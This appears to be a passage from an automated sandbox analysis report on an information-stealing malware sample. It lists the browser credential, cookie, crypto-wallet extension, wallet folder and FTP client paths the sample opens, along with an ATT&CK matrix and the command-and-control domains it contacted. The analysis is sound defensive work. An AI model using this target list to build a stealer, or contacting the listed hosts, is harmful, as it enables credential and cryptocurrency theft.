            Source: Amcache.hve.11.drBinary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23090.2008-0\msmpeng.exe
            Source: 4JPKDcwtDo.exe, 00000004.00000003.1363898461.00000000006D0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
            Source: Amcache.hve.11.drBinary or memory string: MsMpEng.exe
            Source: C:\Users\user\Desktop\4JPKDcwtDo.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiVirusProduct

            Stealing of Sensitive Information

            barindex
            Source: Yara matchFile source: Process Memory Space: 4JPKDcwtDo.exe PID: 7120, type: MEMORYSTR
            Source: Yara matchFile source: sslproxydump.pcap, type: PCAP
            Source: 4JPKDcwtDo.exeString found in binary or memory: "m":["*"],"z":"Wallets/JAXX New Version","d":2,"fs":20971520},{"t":0,"p":"%appdata%\\Electrum\\wallets","m":["*"],"z":"Wallets/Electrum","d":0,"fs":20971520},{"t":0,"p":"%appdata%\\Electrum-LTC\\wallets","m":["*"],"z":"Wallets/Electrum-LTC","d":0,"fs":20971520
            Source: 4JPKDcwtDo.exeString found in binary or memory: Wallets/ElectronCash
            Source: 4JPKDcwtDo.exeString found in binary or memory: %appdata%\com.liberty.jaxx\IndexedDB
            Source: 4JPKDcwtDo.exeString found in binary or memory: window-state.json
            Source: 4JPKDcwtDo.exeString found in binary or memory: %appdata%\Exodus\exodus.wallet
            Source: 4JPKDcwtDo.exeString found in binary or memory: Wallets/Exodus
            Source: 4JPKDcwtDo.exeString found in binary or memory: Wallets/Ethereum
            Source: 4JPKDcwtDo.exe, 00000004.00000003.1352285940.00000000006EA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: %localappdata%\Coinomi\Coinomi\wallets
            Source: 4JPKDcwtDo.exeString found in binary or memory: keystore
            Source: C:\Users\user\Desktop\4JPKDcwtDo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hpglfhgfnhbgpjdenjgmdgoeiappaflnJump to behavior
            Source: C:\Users\user\Desktop\4JPKDcwtDo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeachknmefphepccionboohckonoeemgJump to behavior
            Source: C:\Users\user\Desktop\4JPKDcwtDo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dngmlblcodfobpdpecaadgfbcggfjfnmJump to behavior
            Source: C:\Users\user\Desktop\4JPKDcwtDo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lgmpcpglpngdoalbgeoldeajfclnhafaJump to behavior
            Source: C:\Users\user\Desktop\4JPKDcwtDo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\flpiciilemghbmfalicajoolhkkenfeJump to behavior
            Source: C:\Users\user\Desktop\4JPKDcwtDo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlbmnnijcnlegkjjpcfjclmcfggfefdmJump to behavior
            Source: C:\Users\user\Desktop\4JPKDcwtDo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejjladinnckdgjemekebdpeokbikhfciJump to behavior
            Source: C:\Users\user\Desktop\4JPKDcwtDo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ffnbelfdoeiohenkjibnmadjiehjhajbJump to behavior
            Source: C:\Users\user\Desktop\4JPKDcwtDo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fijngjgcjhjmmpcmkeiomlglpeiijkldJump to behavior
            Source: C:\Users\user\Desktop\4JPKDcwtDo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\abogmiocnneedmmepnohnhlijcjpcifdJump to behavior
            Source: C:\Users\user\Desktop\4JPKDcwtDo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lkcjlnjfpbikmcmbachjpdbijejflpcmJump to behavior
            Source: C:\Users\user\Desktop\4JPKDcwtDo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\oeljdldpnmdbchonielidgobddffflaJump to behavior
            Source: C:\Users\user\Desktop\4JPKDcwtDo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nhnkbkgjikgcigadomkphalanndcapjkJump to behavior
            Source: C:\Users\user\Desktop\4JPKDcwtDo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ilgcnhelpchnceeipipijaljkblbcobJump to behavior
            Source: C:\Users\user\Desktop\4JPKDcwtDo.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data For AccountJump to behavior
            Source: C:\Users\user\Desktop\4JPKDcwtDo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fnjhmkhhmkbjkkabndcnnogagogbneecJump to behavior
            Source: C:\Users\user\Desktop\4JPKDcwtDo.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\formhistory.sqliteJump to behavior
            Source: C:\Users\user\Desktop\4JPKDcwtDo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ijmpgkjfkbfhoebgogflfebnmejmfbmJump to behavior
            Source: C:\Users\user\Desktop\4JPKDcwtDo.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\prefs.jsJump to behavior
            Source: C:\Users\user\Desktop\4JPKDcwtDo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnmamaachppnkjgnildpdmkaakejnhaeJump to behavior
            Source: C:\Users\user\Desktop\4JPKDcwtDo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhmfendgdocmcbmfikdcogofphimnknoJump to behavior
            Source: C:\Users\user\Desktop\4JPKDcwtDo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\egjidjbpglichdcondbcbdnbeeppgdphJump to behavior
            Source: C:\Users\user\Desktop\4JPKDcwtDo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\anokgmphncpekkhclmingpimjmcooifbJump to behavior
            Source: C:\Users\user\Desktop\4JPKDcwtDo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\efbglgofoippbgcjepnhiblaibcnclgkJump to behavior
            Source: C:\Users\user\Desktop\4JPKDcwtDo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data For AccountJump to behavior
            Source: C:\Users\user\Desktop\4JPKDcwtDo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhghoamapcdpbohphigoooaddinpkbaiJump to behavior
            Source: C:\Users\user\Desktop\4JPKDcwtDo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejbalbakoplchlghecdalmeeeajnimhmJump to behavior
            Source: C:\Users\user\Desktop\4JPKDcwtDo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cpojfbodiccabbabgimdeohkkpjfpbnfJump to behavior
            Source: C:\Users\user\Desktop\4JPKDcwtDo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kjmoohlgokccodicjjfebfomlbljgfhkJump to behavior
            Source: C:\Users\user\Desktop\4JPKDcwtDo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\HistoryJump to behavior
            Source: C:\Users\user\Desktop\4JPKDcwtDo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hdokiejnpimakedhajhdlcegeplioahdJump to behavior
            Source: C:\Users\user\Desktop\4JPKDcwtDo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\acmacodkjbdgmoleebolmdjonilkdbchJump to behavior
            Source: C:\Users\user\Desktop\4JPKDcwtDo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mmmjbcfofconkannjonfmjjajpllddbgJump to behavior
            Source: C:\Users\user\Desktop\4JPKDcwtDo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aiifbnbfobpmeekipheeijimdpnlpgppJump to behavior
            Source: C:\Users\user\Desktop\4JPKDcwtDo.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\CookiesJump to behavior
            Source: C:\Users\user\Desktop\4JPKDcwtDo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aholpfdialjgjfhomihkjbmgjidlcdnoJump to behavior
            Source: C:\Users\user\Desktop\4JPKDcwtDo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kncchdigobghenbbaddojjnnaogfppfjJump to behavior
            Source: C:\Users\user\Desktop\4JPKDcwtDo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\klnaejjgbibmhlephnhpmaofohgkpgkdJump to behavior
            Source: C:\Users\user\Desktop\4JPKDcwtDo.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\ProfilesJump to behavior
            Source: C:\Users\user\Desktop\4JPKDcwtDo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cihmoadaighcejopammfbmddcmdekcjeJump to behavior
            Source: C:\Users\user\Desktop\4JPKDcwtDo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mopnmbcafieddcagagdcbnhejhlodfddJump to behavior
            Source: C:\Users\user\Desktop\4JPKDcwtDo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jojhfeoedkpkglbfimdfabpdfjaoolafJump to behavior
            Source: C:\Users\user\Desktop\4JPKDcwtDo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeblfdkhhhdcdjpifhhbdiojplfjncoaJump to behavior
            Source: C:\Users\user\Desktop\4JPKDcwtDo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhhhlbepdkbapadjdnnojkbgioiodbicJump to behavior
            Source: C:\Users\user\Desktop\4JPKDcwtDo.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\HistoryJump to behavior
            Source: C:\Users\user\Desktop\4JPKDcwtDo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cphhlgmgameodnhkjdmkpanlelnlohaoJump to behavior
            Source: C:\Users\user\Desktop\4JPKDcwtDo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dmkamcknogkgcdfhhbddcghachkejeapJump to behavior
            Source: C:\Users\user\Desktop\4JPKDcwtDo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dlcobpjiigpikoobohmabehhmhfoodbbJump to behavior
            Source: C:\Users\user\Desktop\4JPKDcwtDo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\infeboajgfhgbjpjbeppbkgnabfdkdafJump to behavior
            Source: C:\Users\user\Desktop\4JPKDcwtDo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dkdedlpgdmmkkfjabffeganieamfklkmJump to behavior
            Source: C:\Users\user\Desktop\4JPKDcwtDo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ookjlbkiijinhpmnjffcofjonbfbgaocJump to behavior
            Source: C:\Users\user\Desktop\4JPKDcwtDo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nngceckbapebfimnlniiiahkandclblbJump to behavior
            Source: C:\Users\user\Desktop\4JPKDcwtDo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\pioclpoplcdbaefihamjohnefbikjilcJump to behavior
            Source: C:\Users\user\Desktop\4JPKDcwtDo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kkpllkodjeloidieedojogacfhpaihohJump to behavior
            Source: C:\Users\user\Desktop\4JPKDcwtDo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ibnejdfjmmkpcnlpebklmnkoeoihofecJump to behavior
            Source: C:\Users\user\Desktop\4JPKDcwtDo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ppbibelpcjmhbdihakflkdcoccbgbkpoJump to behavior
            Source: C:\Users\user\Desktop\4JPKDcwtDo.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
            Source: C:\Users\user\Desktop\4JPKDcwtDo.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\cert9.dbJump to behavior
            Source: C:\Users\user\Desktop\4JPKDcwtDo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ojggmchlghnjlapmfbnjholfjkiidbchJump to behavior
            Source: C:\Users\user\Desktop\4JPKDcwtDo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kppfdiipphfccemcignhifpjkapfbihdJump to behavior
            Source: C:\Users\user\Desktop\4JPKDcwtDo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jiidiaalihmmhddjgbnbgdfflelocpakJump to behavior
            Source: C:\Users\user\Desktop\4JPKDcwtDo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
            Source: C:\Users\user\Desktop\4JPKDcwtDo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hcflpincpppdclinealmandijcmnkbgnJump to behavior
            Source: C:\Users\user\Desktop\4JPKDcwtDo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhbohimaelbohpjbbldcngcnapndodjpJump to behavior
            Source: C:\Users\user\Desktop\4JPKDcwtDo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknnJump to behavior
            Source: C:\Users\user\Desktop\4JPKDcwtDo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kpfopkelmapcoipemfendmdcghnegimnJump to behavior
            Source: C:\Users\user\Desktop\4JPKDcwtDo.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\cookies.sqliteJump to behavior
            Source: C:\Users\user\Desktop\4JPKDcwtDo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hnfanknocfeofbddgcijnmhnfnkdnaadJump to behavior
            Source: C:\Users\user\Desktop\4JPKDcwtDo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bfnaelmomeimhlpmgjnjophhpkkoljpaJump to behavior
            Source: C:\Users\user\Desktop\4JPKDcwtDo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\blnieiiffboillknjnepogjhkgnoapacJump to behavior
            Source: C:\Users\user\Desktop\4JPKDcwtDo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ocjdpmoallmgmjbbogfiiaofphbjgchhJump to behavior
            Source: C:\Users\user\Desktop\4JPKDcwtDo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mkpegjkblkkefacfnmkajcjmabijhclgJump to behavior
            Source: C:\Users\user\Desktop\4JPKDcwtDo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fihkakfobkmkjojpchpfgcmhfjnmnfpiJump to behavior
            Source: C:\Users\user\Desktop\4JPKDcwtDo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onofpnbbkehpmmoabgpcpmigafmmnjhJump to behavior
            Source: C:\Users\user\Desktop\4JPKDcwtDo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlgbhdfgdhgbiamfdfmbikcdghidoaddJump to behavior
            Source: C:\Users\user\Desktop\4JPKDcwtDo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\afbcbjpbpfadlkmhmclhkeeodmamcflcJump to behavior
            Source: C:\Users\user\Desktop\4JPKDcwtDo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cjelfplplebdjjenllpjcblmjkfcffneJump to behavior
            Source: C:\Users\user\Desktop\4JPKDcwtDo.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\logins.jsonJump to behavior
            Source: C:\Users\user\Desktop\4JPKDcwtDo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nknhiehlklippafakaeklbeglecifhadJump to behavior
            Source: C:\Users\user\Desktop\4JPKDcwtDo.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\places.sqliteJump to behavior
            Source: C:\Users\user\Desktop\4JPKDcwtDo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\ilgcnhelpchnceeipipijaljkblbcobJump to behavior
            Source: C:\Users\user\Desktop\4JPKDcwtDo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\opcgpfmipidbgpenhmajoajpbobppdilJump to behavior
            Source: C:\Users\user\Desktop\4JPKDcwtDo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nanjmdknhkinifnkgdcggcfnhdaammmjJump to behavior
            Source: C:\Users\user\Desktop\4JPKDcwtDo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\amkmjjmmflddogmhpjloimipbofnfjihJump to behavior
            Source: C:\Users\user\Desktop\4JPKDcwtDo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mcohilncbfahbmgdjkbpemcciiolgcgeJump to behavior
            Source: C:\Users\user\Desktop\4JPKDcwtDo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jgaaimajipbpdogpdglhaphldakikgefJump to behavior
            Source: C:\Users\user\Desktop\4JPKDcwtDo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jnlgamecbpmbajjfhmmmlhejkemejdmaJump to behavior
            Source: C:\Users\user\Desktop\4JPKDcwtDo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
            Source: C:\Users\user\Desktop\4JPKDcwtDo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\oeljdldpnmdbchonielidgobddffflaJump to behavior
            Source: C:\Users\user\Desktop\4JPKDcwtDo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\imloifkgjagghnncjkhggdhalmcnfklkJump to behavior
            Source: C:\Users\user\Desktop\4JPKDcwtDo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\phkbamefinggmakgklpkljjmgibohnbaJump to behavior
            Source: C:\Users\user\Desktop\4JPKDcwtDo.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\key4.dbJump to behavior
            Source: C:\Users\user\Desktop\4JPKDcwtDo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bcopgchhojmggmffilplmbdicgaihlkpJump to behavior
            Source: C:\Users\user\Desktop\4JPKDcwtDo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hifafgmccdpekplomjjkcfgodnhcelljJump to behavior
            Source: C:\Users\user\Desktop\4JPKDcwtDo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\gaedmjdfmmahhbjefcbgaolhhanlaolbJump to behavior
            Source: C:\Users\user\Desktop\4JPKDcwtDo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkddgncdjgjfcddamfgcmfnlhccnimigJump to behavior
            Source: C:\Users\user\Desktop\4JPKDcwtDo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
            Source: C:\Users\user\Desktop\4JPKDcwtDo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnncmdhjacpkmjmkcafchppbnpnhdmonJump to behavior
            Source: C:\Users\user\Desktop\4JPKDcwtDo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jbdaocneiiinmjbjlgalhcelgbejmnidJump to behavior
            Source: C:\Users\user\Desktop\4JPKDcwtDo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lpfcbjknijpeeillifnkikgncikgfhdoJump to behavior
            Source: C:\Users\user\Desktop\4JPKDcwtDo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aflkmfhebedbjioipglgcbcmnbpgliofJump to behavior
            Source: C:\Users\user\Desktop\4JPKDcwtDo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lodccjjbdhfakaekdiahmedfbieldgikJump to behavior
            Source: C:\Users\user\Desktop\4JPKDcwtDo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\heefohaffomkkkphnlpohglngmbcclhiJump to behavior
            Source: C:\Users\user\Desktop\4JPKDcwtDo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\bhghoamapcdpbohphigoooaddinpkbaiJump to behavior
            Source: C:\Users\user\Desktop\4JPKDcwtDo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mnfifefkajgofkcjkemidiaecocnkjehJump to behavior
            Source: C:\Users\user\Desktop\4JPKDcwtDo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fcfcfllfndlomdhbehjjcoimbgofdncgJump to behavior
            Source: C:\Users\user\Desktop\4JPKDcwtDo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onhogfjeacnfoofkfgppdlbmlmnplgbnJump to behavior
            Source: C:\Users\user\Desktop\4JPKDcwtDo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\loinekcabhlmhjjbocijdoimmejangoaJump to behavior
            Source: C:\Users\user\Desktop\4JPKDcwtDo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\idnnbdplmphpflfnlkomgpfbpcgelopgJump to behavior
            Source: C:\Users\user\Desktop\4JPKDcwtDo.exeFile opened: C:\Users\user\AppData\Roaming\FTPboxJump to behavior
            Source: C:\Users\user\Desktop\4JPKDcwtDo.exeFile opened: C:\Users\user\AppData\Roaming\SmartFTP\Client 2.0\FavoritesJump to behavior
            Source: C:\Users\user\Desktop\4JPKDcwtDo.exeFile opened: C:\Users\user\AppData\Roaming\FTPRushJump to behavior
            Source: C:\Users\user\Desktop\4JPKDcwtDo.exeFile opened: C:\Users\user\AppData\Roaming\Conceptworld\NotezillaJump to behavior
            Source: C:\Users\user\Desktop\4JPKDcwtDo.exeFile opened: C:\Users\user\AppData\Roaming\FTPGetterJump to behavior
            Source: C:\Users\user\Desktop\4JPKDcwtDo.exeFile opened: C:\Users\user\AppData\Roaming\FTPInfoJump to behavior
            Source: C:\Users\user\Desktop\4JPKDcwtDo.exeFile opened: C:\ProgramData\SiteDesigner\3D-FTPJump to behavior
            Source: C:\Users\user\Desktop\4JPKDcwtDo.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.walletJump to behavior
            Source: C:\Users\user\Desktop\4JPKDcwtDo.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.walletJump to behavior
            Source: C:\Users\user\Desktop\4JPKDcwtDo.exeFile opened: C:\Users\user\AppData\Roaming\Ledger LiveJump to behavior
            Source: C:\Users\user\Desktop\4JPKDcwtDo.exeFile opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldbJump to behavior
            Source: C:\Users\user\Desktop\4JPKDcwtDo.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\walletsJump to behavior
            Source: C:\Users\user\Desktop\4JPKDcwtDo.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\walletsJump to behavior
            Source: C:\Users\user\Desktop\4JPKDcwtDo.exeFile opened: C:\Users\user\AppData\Roaming\Bitcoin\walletsJump to behavior
            Source: C:\Users\user\Desktop\4JPKDcwtDo.exeFile opened: C:\Users\user\AppData\Roaming\BinanceJump to behavior
            Source: C:\Users\user\Desktop\4JPKDcwtDo.exeFile opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDBJump to behavior
            Source: C:\Users\user\Desktop\4JPKDcwtDo.exeFile opened: C:\Users\user\AppData\Roaming\Electrum\walletsJump to behavior
            Source: C:\Users\user\Desktop\4JPKDcwtDo.exeFile opened: C:\Users\user\AppData\Roaming\Electrum-LTC\walletsJump to behavior
            Source: C:\Users\user\Desktop\4JPKDcwtDo.exeFile opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDBJump to behavior
            Source: Yara matchFile source: 00000004.00000003.1352139150.000000000074C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000003.1352545477.0000000000750000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: 4JPKDcwtDo.exe PID: 7120, type: MEMORYSTR

            Remote Access Functionality

            barindex
            Source: Yara matchFile source: Process Memory Space: 4JPKDcwtDo.exe PID: 7120, type: MEMORYSTR
            Source: Yara matchFile source: sslproxydump.pcap, type: PCAP
            ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
            Gather Victim Identity InformationAcquire InfrastructureValid Accounts12
            Windows Management Instrumentation
            1
            DLL Side-Loading
            1
            Process Injection
            21
            Virtualization/Sandbox Evasion
            2
            OS Credential Dumping
            221
            Security Software Discovery
            Remote Services1
            Archive Collected Data
            11
            Encrypted Channel
            Exfiltration Over Other Network MediumAbuse Accessibility Features
            CredentialsDomainsDefault AccountsScheduled Task/JobBoot or Logon Initialization Scripts1
            DLL Side-Loading
            1
            Process Injection
            LSASS Memory21
            Virtualization/Sandbox Evasion
            Remote Desktop Protocol4
            Data from Local System
            2
            Non-Application Layer Protocol
            Exfiltration Over BluetoothNetwork Denial of Service
            Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)2
            Obfuscated Files or Information
            Security Account Manager1
            Process Discovery
            SMB/Windows Admin SharesData from Network Shared Drive13
            Application Layer Protocol
            Automated ExfiltrationData Encrypted for Impact
            Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook22
            Software Packing
            NTDS22
            System Information Discovery
            Distributed Component Object ModelInput CaptureProtocol ImpersonationTraffic DuplicationData Destruction
            Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
            DLL Side-Loading
            LSA SecretsInternet Connection DiscoverySSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
            Hide Legend

            Legend:

            • Process
            • Signature
            • Created File
            • DNS/IP Info
            • Is Dropped
            • Is Windows Process
            • Number of created Registry Values
            • Number of created Files
            • Visual Basic
            • Delphi
            • Java
            • .Net C# or VB.NET
            • C, C++ or other language
            • Is malicious
            • Internet
            behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1599847 Sample: 4JPKDcwtDo.exe Startdate: 26/01/2025 Architecture: WINDOWS Score: 100 16 financialfreez.click 2->16 18 toppyneedus.biz 2->18 20 impolitewearr.biz 2->20 24 Suricata IDS alerts for network traffic 2->24 26 Malicious sample detected (through community Yara rule) 2->26 28 Antivirus detection for URL or domain 2->28 30 5 other signatures 2->30 7 4JPKDcwtDo.exe 2->7         started        signatures3 process4 dnsIp5 22 toppyneedus.biz 172.67.149.66, 443, 49700, 49701 CLOUDFLARENETUS United States 7->22 32 Detected unpacking (changes PE section rights) 7->32 34 Detected unpacking (overwrites its own PE header) 7->34 36 Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines) 7->36 38 5 other signatures 7->38 11 WerFault.exe 21 16 7->11         started        signatures6 process7 file8 14 C:\ProgramData\Microsoft\...\Report.wer, Unicode 11->14 dropped

